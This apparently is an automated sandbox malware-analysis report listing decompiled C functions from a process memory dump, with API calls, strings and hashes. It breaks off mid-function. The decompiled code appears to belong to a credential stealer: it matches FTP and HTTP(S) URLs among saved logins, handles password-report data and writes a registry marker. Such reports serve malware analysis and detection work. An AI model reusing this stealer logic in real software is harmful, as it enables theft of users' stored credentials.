                                                                                                                                        0x0bc0989a
                                                                                                                                        0x0bc098a0
                                                                                                                                        0x0bc098a8
                                                                                                                                        0x0bc098be
                                                                                                                                        0x0bc098c4
                                                                                                                                        0x0bc098ca
                                                                                                                                        0x0bc098d3
                                                                                                                                        0x0bc098d4
                                                                                                                                        0x0bc098f0
                                                                                                                                        0x0bc098d6
                                                                                                                                        0x0bc098db
                                                                                                                                        0x0bc098e4
                                                                                                                                        0x0bc098e9
                                                                                                                                        0x0bc09903
                                                                                                                                        0x0bc09909
                                                                                                                                        0x0bc0990f
                                                                                                                                        0x0bc09918
                                                                                                                                        0x0bc09983
                                                                                                                                        0x0bc09989
                                                                                                                                        0x0bc0991a
                                                                                                                                        0x0bc0991a
                                                                                                                                        0x0bc0991d
                                                                                                                                        0x0bc0991f
                                                                                                                                        0x0bc09937
                                                                                                                                        0x0bc09945
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0994f
                                                                                                                                        0x0bc09955
                                                                                                                                        0x0bc0995b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0995d
                                                                                                                                        0x0bc0995d
                                                                                                                                        0x0bc0995d
                                                                                                                                        0x0bc0996f
                                                                                                                                        0x0bc09975
                                                                                                                                        0x0bc09981
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09981
                                                                                                                                        0x0bc09969
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09969
                                                                                                                                        0x0bc0998f
                                                                                                                                        0x0bc09995
                                                                                                                                        0x0bc0999a
                                                                                                                                        0x0bc09859
                                                                                                                                        0x0bc0986f
                                                                                                                                        0x0bc09871
                                                                                                                                        0x0bc09871
                                                                                                                                        0x0bc09881
                                                                                                                                        0x0bc0988d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0988d
                                                                                                                                        0x0bc099af

                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(Software\Skype,?,?), ref: 0BC0984A
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,HWID,00000000,00000003,?,0BC02734), ref: 0BC09867
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC09881
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0BC098A0
                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 0BC098BE
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 0BC09909
                                                                                                                                        • WriteFile.KERNEL32(?,?,0BC02734,?,00000000), ref: 0BC0993D
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0BC09975
                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0BC09989
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile$Close$DeleteDirectoryHandlePathTempValueWrite
                                                                                                                                        • String ID: HWID$Software\Skype
                                                                                                                                        • API String ID: 1781080854-498293505
                                                                                                                                        • Opcode ID: 32430f215b679bcbceab4d51ffa7710896eebf0e00317a8f7c43888acae79ad3
                                                                                                                                        • Instruction ID: 06b5ad80a0d3e2e4f661c8dbc52b5e44eec4f918b80bb4b620688f91c78c5e2b
                                                                                                                                        • Opcode Fuzzy Hash: 32430f215b679bcbceab4d51ffa7710896eebf0e00317a8f7c43888acae79ad3
                                                                                                                                        • Instruction Fuzzy Hash: 67411071D2012C9FDB259F69DC45BDABBB9FB08754F0046A5F619A2181DBB08F80CFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC06AA8, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 147stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC06AA8(intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t45;
				int _t46;
				intOrPtr _t61;
				intOrPtr _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t88;
				void* _t98;

				_t74 = _a16;
				if(_t74 == 0) {
					L26:
					return _t37;
				}
				_t37 =  *0xbc10d58; // 0x0
				if(_t37 >= _t74) {
					goto L26;
				}
				_t69 =  *0xbc10d4c; // 0x0
				if(_t69 >= _t74) {
					L25:
					return _t37;
				}
				_t88 =  *0xbc10d20; // 0x0
				if(_t88 >= _t74) {
					L24:
					goto L25;
				}
				E0BC0326D(_t37,  &_a16,  &_v24,  &_v8, _a12);
				E0BC0326D(_t69,  &_v16,  &_v24,  &_v20, _a12);
				_t37 = E0BC0326D(_t88,  &_v12,  &_v28,  &_v24, _a12);
				_t96 = _a16;
				if(_a16 == 0 || _v12 == 0) {
					L23:
					goto L24;
				} else {
					_t71 = E0BC08D51( &(_t96[1]));
					_a16 = _t71;
					E0BC08D91(_v8, _t71, _t96);
					_t45 =  *0xbc10d54; // 0x3
					if(_t45 != 0) {
						if(_t45 != 1) {
							if(_t45 != 2) {
								_t46 = _a16;
							} else {
								_t46 = 0;
							}
						} else {
							_t96 = "ftp.";
							_t46 = StrCmpNIA(_t71, _t96, lstrlenA(_t96));
						}
						L15:
						if(_t46 != 0) {
							L22:
							_t37 = E0BC08D3D(_a16);
							goto L23;
						}
						L16:
						_t85 = _v16;
						if(_v16 == 0) {
							L18:
							_v8 = E0BC08EE2(" ", " ");
							L19:
							_t80 = _v24;
							_t98 = E0BC06347(_v24, _v12, _t96);
							if(_a16 != 0 && _t98 != 0) {
								_t90 = _a8;
								E0BC08C37(_a20);
								_v24 = 1;
								E0BC08A41( &_v24, _t80, _a8, 4);
								E0BC08C6D(_a8, _t80, _a16);
								E0BC08C6D(_a8, _t80, _v8);
								E0BC08C6D(_t90, _t80, _t98);
								E0BC08D3D(_v8);
								E0BC08D3D(_t98);
							}
							goto L22;
						}
						_t61 = E0BC06347(_v20, _t85, _t96);
						_v8 = _t61;
						if(_t61 != 0) {
							goto L19;
						}
						goto L18;
					}
					_t96 = "ftp://";
					if(StrCmpNIA(_t71, _t96, lstrlenA(_t96)) == 0) {
						goto L16;
					}
					_t96 = "http://";
					if(StrCmpNIA(_a16, _t96, lstrlenA(_t96)) == 0) {
						goto L16;
					} else {
						_t96 = "https://";
						_t46 = StrCmpNIA(_a16, _t96, lstrlenA(_t96));
						goto L15;
					}
				}
			}





















                                                                                                                                        0x0bc06aab
                                                                                                                                        0x0bc06ab3
                                                                                                                                        0x0bc06c57
                                                                                                                                        0x0bc06c57
                                                                                                                                        0x0bc06c57
                                                                                                                                        0x0bc06ab9
                                                                                                                                        0x0bc06ac0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06ac7
                                                                                                                                        0x0bc06acf
                                                                                                                                        0x0bc06c55
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06c55
                                                                                                                                        0x0bc06ad6
                                                                                                                                        0x0bc06ade
                                                                                                                                        0x0bc06c54
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06c54
                                                                                                                                        0x0bc06af1
                                                                                                                                        0x0bc06b04
                                                                                                                                        0x0bc06b17
                                                                                                                                        0x0bc06b1c
                                                                                                                                        0x0bc06b24
                                                                                                                                        0x0bc06c53
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06b34
                                                                                                                                        0x0bc06b3c
                                                                                                                                        0x0bc06b43
                                                                                                                                        0x0bc06b46
                                                                                                                                        0x0bc06b4b
                                                                                                                                        0x0bc06b52
                                                                                                                                        0x0bc06b98
                                                                                                                                        0x0bc06bb4
                                                                                                                                        0x0bc06bba
                                                                                                                                        0x0bc06bb6
                                                                                                                                        0x0bc06bb6
                                                                                                                                        0x0bc06bb6
                                                                                                                                        0x0bc06b9a
                                                                                                                                        0x0bc06b9a
                                                                                                                                        0x0bc06ba9
                                                                                                                                        0x0bc06ba9
                                                                                                                                        0x0bc06bbd
                                                                                                                                        0x0bc06bbf
                                                                                                                                        0x0bc06c4a
                                                                                                                                        0x0bc06c4d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06c52
                                                                                                                                        0x0bc06bc5
                                                                                                                                        0x0bc06bc5
                                                                                                                                        0x0bc06bca
                                                                                                                                        0x0bc06bdb
                                                                                                                                        0x0bc06be7
                                                                                                                                        0x0bc06bea
                                                                                                                                        0x0bc06bed
                                                                                                                                        0x0bc06bf9
                                                                                                                                        0x0bc06bfb
                                                                                                                                        0x0bc06c04
                                                                                                                                        0x0bc06c07
                                                                                                                                        0x0bc06c11
                                                                                                                                        0x0bc06c18
                                                                                                                                        0x0bc06c22
                                                                                                                                        0x0bc06c2c
                                                                                                                                        0x0bc06c34
                                                                                                                                        0x0bc06c3c
                                                                                                                                        0x0bc06c42
                                                                                                                                        0x0bc06c47
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06bfb
                                                                                                                                        0x0bc06bcf
                                                                                                                                        0x0bc06bd4
                                                                                                                                        0x0bc06bd9
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06bd9
                                                                                                                                        0x0bc06b5a
                                                                                                                                        0x0bc06b6f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06b71
                                                                                                                                        0x0bc06b82
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06b84
                                                                                                                                        0x0bc06b84
                                                                                                                                        0x0bc06b91
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06b91
                                                                                                                                        0x0bc06b82

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • lstrlenA.KERNEL32(ftp://,?,00000000,?), ref: 0BC06B60
                                                                                                                                        • StrCmpNIA.SHLWAPI(00000000,ftp://,00000000), ref: 0BC06B6B
                                                                                                                                        • lstrlenA.KERNEL32(http://), ref: 0BC06B77
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000), ref: 0BC06B7E
                                                                                                                                        • lstrlenA.KERNEL32(https://), ref: 0BC06B8A
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000), ref: 0BC06B91
                                                                                                                                        • lstrlenA.KERNEL32(ftp.,?,00000000,?), ref: 0BC06BA0
                                                                                                                                        • StrCmpNIA.SHLWAPI(00000000,ftp.,00000000), ref: 0BC06BA9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AddressAllocHandleLocalModuleProc
                                                                                                                                        • String ID: ftp.$ftp://$http://$https://
                                                                                                                                        • API String ID: 3606698760-2878239594
                                                                                                                                        • Opcode ID: 06383c07d904a962e8bc3e0e2dcd87f0f67ae5b847eaf504374533e976265dad
                                                                                                                                        • Instruction ID: 676f4aa3000d4386d14c3560e738b3000b97feadb63eea3f19cef7d832ceb7e2
                                                                                                                                        • Opcode Fuzzy Hash: 06383c07d904a962e8bc3e0e2dcd87f0f67ae5b847eaf504374533e976265dad
                                                                                                                                        • Instruction Fuzzy Hash: 73413D71A3111A9BCF11EFA5DD819AF77B9EF40354B104424E805B7290EF30EE65AAA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC02D22, Relevance: 16.7, APIs: 8, Strings: 3, Instructions: 158stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                        			E0BC02D22(void* _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				char _v8;
				char* _v12;
				void* _v16;
				CHAR* _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				void* __esi;
				void* _t53;
				intOrPtr _t58;
				intOrPtr _t72;
				void* _t91;
				CHAR* _t93;
				CHAR* _t94;
				char _t95;
				intOrPtr _t107;
				CHAR* _t110;
				void* _t117;
				void* _t119;
				void* _t126;

				_t95 = _a16;
				_t91 = 0;
				if(_t95 == 0) {
					L26:
					return _t53;
				}
				_t53 =  *0xbc10d60; // 0x1
				if(_t53 >= _t95) {
					goto L26;
				}
				_t126 =  *0xbc10d40 - _t95; // 0x5
				if(_t126 >= 0) {
					goto L26;
				}
				_t107 =  *0xbc10d18; // 0x3
				if(_t107 >= _t95) {
					L25:
					goto L26;
				}
				E0BC0326D(_t53,  &_a16,  &_v28,  &_v24, _a12);
				E0BC0326D(_t107,  &_v8,  &_v28,  &_v20, _a12);
				if(lstrcmpA(_v20, " ") == 0 || _v8 == 0) {
					_v8 = 3;
					_v20 = "no";
				}
				_t58 =  *0xbc10d40; // 0x5
				_t100 =  &_v16;
				E0BC0326D(_t58,  &_v16,  &_v12,  &_v28, _a12);
				_t117 = _v16;
				_t109 = _v28;
				_v44 = _t117;
				_v40 = _v28;
				_v32 = _t91;
				_t53 = E0BC01000( &_v44, _t91,  &_v36);
				if(_t53 == 0 || _v32 == _t91) {
					L24:
					goto L25;
				} else {
					_t53 = _v36;
					if(_t53 > _t117) {
						goto L24;
					}
					E0BC08D5E(_t53 + 1, _t109, _t91, _t53 + 1);
					E0BC08D91(_v32, _t109, _v36);
					_t119 = _v36;
					_v16 = _t119;
					_t53 = LocalFree(_v32);
					if(_a16 == _t91 || _t119 == _t91) {
						goto L24;
					} else {
						_v12 = E0BC08D51(_a16);
						E0BC08D91(_v24, _t66, _a16);
						_t110 = "ftp://";
						if(StrCmpNIA(_v12, _t110, lstrlenA(_t110)) == _t91) {
							L16:
							E0BC08C37(_a20);
							_t72 =  *0xbc10d48; // 0x1
							E0BC08C37(_t72);
							E0BC08C37(_a16);
							_t76 = _v24;
							if(_v24 != _t91) {
								E0BC08C4D(_t76, _t100, _a16);
								_pop(_t100);
							}
							E0BC08C37(_v8);
							if(_v8 != _t91) {
								_t83 = _v20;
								if(_v20 != _t91) {
									E0BC08C4D(_t83, _t100, _v8);
									_pop(_t100);
								}
							}
							E0BC08C37(_v16);
							_t81 = _v28;
							if(_v28 != _t91) {
								E0BC08C4D(_t81, _t100, _v16);
							}
							L23:
							_t53 = E0BC08D3D(_v12);
							goto L24;
						}
						_t93 = "http://";
						if(StrCmpNIA(_v12, _t93, lstrlenA(_t93)) == 0) {
							L15:
							_t91 = 0;
							goto L16;
						}
						_t94 = "https://";
						if(StrCmpNIA(_v12, _t94, lstrlenA(_t94)) != 0) {
							goto L23;
						}
						goto L15;
					}
				}
			}


























                                                                                                                                        0x0bc02d25
                                                                                                                                        0x0bc02d2c
                                                                                                                                        0x0bc02d30
                                                                                                                                        0x0bc02efc
                                                                                                                                        0x0bc02efe
                                                                                                                                        0x0bc02efe
                                                                                                                                        0x0bc02d36
                                                                                                                                        0x0bc02d3d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02d43
                                                                                                                                        0x0bc02d49
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02d50
                                                                                                                                        0x0bc02d58
                                                                                                                                        0x0bc02efb
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02efb
                                                                                                                                        0x0bc02d6b
                                                                                                                                        0x0bc02d7e
                                                                                                                                        0x0bc02d95
                                                                                                                                        0x0bc02d9c
                                                                                                                                        0x0bc02da3
                                                                                                                                        0x0bc02da3
                                                                                                                                        0x0bc02dad
                                                                                                                                        0x0bc02db8
                                                                                                                                        0x0bc02dbb
                                                                                                                                        0x0bc02dc0
                                                                                                                                        0x0bc02dc3
                                                                                                                                        0x0bc02dcf
                                                                                                                                        0x0bc02dd2
                                                                                                                                        0x0bc02dd5
                                                                                                                                        0x0bc02dd8
                                                                                                                                        0x0bc02de2
                                                                                                                                        0x0bc02efa
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02df1
                                                                                                                                        0x0bc02df1
                                                                                                                                        0x0bc02df6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02e00
                                                                                                                                        0x0bc02e0c
                                                                                                                                        0x0bc02e11
                                                                                                                                        0x0bc02e17
                                                                                                                                        0x0bc02e1a
                                                                                                                                        0x0bc02e23
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02e31
                                                                                                                                        0x0bc02e3c
                                                                                                                                        0x0bc02e43
                                                                                                                                        0x0bc02e4e
                                                                                                                                        0x0bc02e65
                                                                                                                                        0x0bc02e8f
                                                                                                                                        0x0bc02e95
                                                                                                                                        0x0bc02e9a
                                                                                                                                        0x0bc02e9f
                                                                                                                                        0x0bc02ea7
                                                                                                                                        0x0bc02eac
                                                                                                                                        0x0bc02eb1
                                                                                                                                        0x0bc02eb6
                                                                                                                                        0x0bc02ebb
                                                                                                                                        0x0bc02ebb
                                                                                                                                        0x0bc02ebf
                                                                                                                                        0x0bc02ec7
                                                                                                                                        0x0bc02ec9
                                                                                                                                        0x0bc02ece
                                                                                                                                        0x0bc02ed3
                                                                                                                                        0x0bc02ed8
                                                                                                                                        0x0bc02ed8
                                                                                                                                        0x0bc02ece
                                                                                                                                        0x0bc02edc
                                                                                                                                        0x0bc02ee1
                                                                                                                                        0x0bc02ee6
                                                                                                                                        0x0bc02eeb
                                                                                                                                        0x0bc02ef0
                                                                                                                                        0x0bc02ef1
                                                                                                                                        0x0bc02ef4
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02ef9
                                                                                                                                        0x0bc02e67
                                                                                                                                        0x0bc02e78
                                                                                                                                        0x0bc02e8d
                                                                                                                                        0x0bc02e8d
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02e8d
                                                                                                                                        0x0bc02e7a
                                                                                                                                        0x0bc02e8b
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02e8b
                                                                                                                                        0x0bc02e23

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpA.KERNEL32(?,0BC0D7DC), ref: 0BC02D8D
                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,?), ref: 0BC02E1A
                                                                                                                                        • lstrlenA.KERNEL32(ftp://,?,00000000,?), ref: 0BC02E54
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000), ref: 0BC02E61
                                                                                                                                        • lstrlenA.KERNEL32(http://), ref: 0BC02E6D
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000), ref: 0BC02E74
                                                                                                                                        • lstrlenA.KERNEL32(https://), ref: 0BC02E80
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000), ref: 0BC02E87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FreeLocallstrcmp
                                                                                                                                        • String ID: ftp://$http://$https://
                                                                                                                                        • API String ID: 3486702906-2804853444
                                                                                                                                        • Opcode ID: b7576b877c08da18b120b43c3da25497741b062bf176d9046481ffaa7ff454e5
                                                                                                                                        • Instruction ID: c13d4c13146222b9501ad0a1663472adb91a1f4194607a0c8b1a88e7ddfd74eb
                                                                                                                                        • Opcode Fuzzy Hash: b7576b877c08da18b120b43c3da25497741b062bf176d9046481ffaa7ff454e5
                                                                                                                                        • Instruction Fuzzy Hash: 5F515B7193025EAFCF10EF94DC859AEBBB9FF14205B104425E911BB190DF30AE41EBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC09539, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 70stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                        			E0BC09539(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v276;
				intOrPtr _v280;
				signed int _v284;
				void* _v288;
				intOrPtr _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void** _t19;
				intOrPtr _t25;
				void* _t26;
				void* _t47;
				intOrPtr _t48;
				signed int _t50;

				_t47 = __edx;
				_t42 = __ecx;
				_t17 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t17 ^ _t50;
				_v284 = _v284 & 0x00000000;
				_t19 =  &_v288;
				_t48 = __ecx;
				__imp__GetHGlobalFromStream(__ecx, _t19);
				if(_t19 >= 0) {
					_t25 = E0BC089A1(__ecx, __ecx);
					_t49 = _t25;
					_v292 = _t25;
					_t26 = GlobalLock(_v288);
					_t40 = _t26;
					if(_t26 != 0) {
						_v280 = E0BC08D51(_t49);
						E0BC08D91(_t40, _t28, _t49);
						GlobalUnlock(_v288);
						E0BC094CA(E0BC09469( &_v276, _t42, "CReportPassword", lstrlenA("CReportPassword")), _t42, _v280, _t49);
						_t49 = _t48;
						E0BC08B39(_t48);
						_t40 = "NCRYPTED";
						E0BC08A41("NCRYPTED", _t42, _t48, 8);
						_v284 = E0BC08C4D(_v280, _t42, _v292);
						E0BC08D3D(_v280);
					}
				}
				E0BC08B27(_t48);
				return E0BC09FDC(_v284, _t40, _v8 ^ _t50, _t47, _t48, _t49);
			}



















                                                                                                                                        0x0bc09539
                                                                                                                                        0x0bc09539
                                                                                                                                        0x0bc09542
                                                                                                                                        0x0bc09549
                                                                                                                                        0x0bc0954c
                                                                                                                                        0x0bc09556
                                                                                                                                        0x0bc0955c
                                                                                                                                        0x0bc09560
                                                                                                                                        0x0bc09568
                                                                                                                                        0x0bc09570
                                                                                                                                        0x0bc0957b
                                                                                                                                        0x0bc0957d
                                                                                                                                        0x0bc09583
                                                                                                                                        0x0bc09589
                                                                                                                                        0x0bc0958d
                                                                                                                                        0x0bc0959d
                                                                                                                                        0x0bc095a3
                                                                                                                                        0x0bc095ae
                                                                                                                                        0x0bc095d4
                                                                                                                                        0x0bc095d9
                                                                                                                                        0x0bc095db
                                                                                                                                        0x0bc095e2
                                                                                                                                        0x0bc095e7
                                                                                                                                        0x0bc09607
                                                                                                                                        0x0bc0960d
                                                                                                                                        0x0bc09612
                                                                                                                                        0x0bc0958d
                                                                                                                                        0x0bc09615
                                                                                                                                        0x0bc0962e

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,1.00), ref: 0BC09560
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC09583
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000), ref: 0BC095AE
                                                                                                                                        • lstrlenA.KERNEL32(CReportPassword), ref: 0BC095BA
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AddressAllocFreeFromHandleLockModuleProcStreamUnlocklstrlen
                                                                                                                                        • String ID: 1.00$CReportPassword$NCRYPTED
                                                                                                                                        • API String ID: 631361431-2696888955
                                                                                                                                        • Opcode ID: 7047a5cec0e03cc88bdaf4bdbfa1f6a488eec97bb42d7d5d0f49943177eb25d6
                                                                                                                                        • Instruction ID: d707890b69d94be1d190dbc399f58090d71686cc8ec3286b99f79195f6c950ae
                                                                                                                                        • Opcode Fuzzy Hash: 7047a5cec0e03cc88bdaf4bdbfa1f6a488eec97bb42d7d5d0f49943177eb25d6
                                                                                                                                        • Instruction Fuzzy Hash: 93216671A3021C5FCF256B64DC86BDE77B8EF05710F0045D5E609A2281DF749E81AEA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.20%

                                                                                                                                        Function 0BC08FF4, Relevance: 10.6, APIs: 7, Instructions: 62fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08FF4(void** __esi, CHAR* _a4) {
				void* _t9;
				void* _t13;
				void* _t17;
				void* _t21;
				void** _t24;

				_t24 = __esi;
				E0BC08D5E(_t9, __esi, 0, 0x10);
				_t21 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
				 *__esi = _t21;
				if(_t21 != 0xffffffff) {
					__esi[3] = GetFileSize(_t21, 0);
					_t13 = CreateFileMappingA(_t21, 0, 2, 0, 0, 0);
					if(_t13 == 0) {
						CloseHandle(_t21);
						L6:
						 *_t24 =  *_t24 | 0xffffffff;
						L7:
						return 0 | _t24[2] != 0x00000000;
					}
					__esi[1] = _t13;
					_t17 = MapViewOfFile(_t13, 4, 0, 0, 0);
					__esi[2] = _t17;
					if(_t17 != 0) {
						goto L7;
					}
					CloseHandle(__esi[1]);
					CloseHandle( *__esi);
					goto L6;
				}
				return 0;
			}








                                                                                                                                        0x0bc08ff4
                                                                                                                                        0x0bc08fff
                                                                                                                                        0x0bc09019
                                                                                                                                        0x0bc0901b
                                                                                                                                        0x0bc09020
                                                                                                                                        0x0bc09035
                                                                                                                                        0x0bc09038
                                                                                                                                        0x0bc09040
                                                                                                                                        0x0bc0906a
                                                                                                                                        0x0bc09070
                                                                                                                                        0x0bc09070
                                                                                                                                        0x0bc09073
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09078
                                                                                                                                        0x0bc09048
                                                                                                                                        0x0bc0904b
                                                                                                                                        0x0bc09051
                                                                                                                                        0x0bc09056
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09061
                                                                                                                                        0x0bc09065
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09065
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000010,00000000,?,?,0BC01F2C,00000000), ref: 0BC09013
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0BC01F2C,00000000), ref: 0BC09028
                                                                                                                                        • CreateFileMappingA.KERNEL32 ref: 0BC09038
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,0BC01F2C,00000000), ref: 0BC0904B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,0BC01F2C,00000000), ref: 0BC09061
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,0BC01F2C,00000000), ref: 0BC09065
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandle$MappingSizeView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2246244431-0
                                                                                                                                        • Opcode ID: 87e5469fc0ae866301d7b42231647d66ee5bd60514acd9199fa6a6c66c0c95f9
                                                                                                                                        • Instruction ID: c5c0e31b742801adaa015f9beca2a2680c6232918ca1c775bea88dc5848049e4
                                                                                                                                        • Opcode Fuzzy Hash: 87e5469fc0ae866301d7b42231647d66ee5bd60514acd9199fa6a6c66c0c95f9
                                                                                                                                        • Instruction Fuzzy Hash: E4112D70520641BED6301B76EC8DF177EFCEBCAB28F208A1DF2A6911D1DA719640CA24
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.16%

                                                                                                                                        Function 0BC04F4F, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 89stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                        			E0BC04F4F(WCHAR* __ecx, void* __edx, CHAR* _a4) {
				signed int _v8;
				char _v12;
				char _v32;
				char _v160;
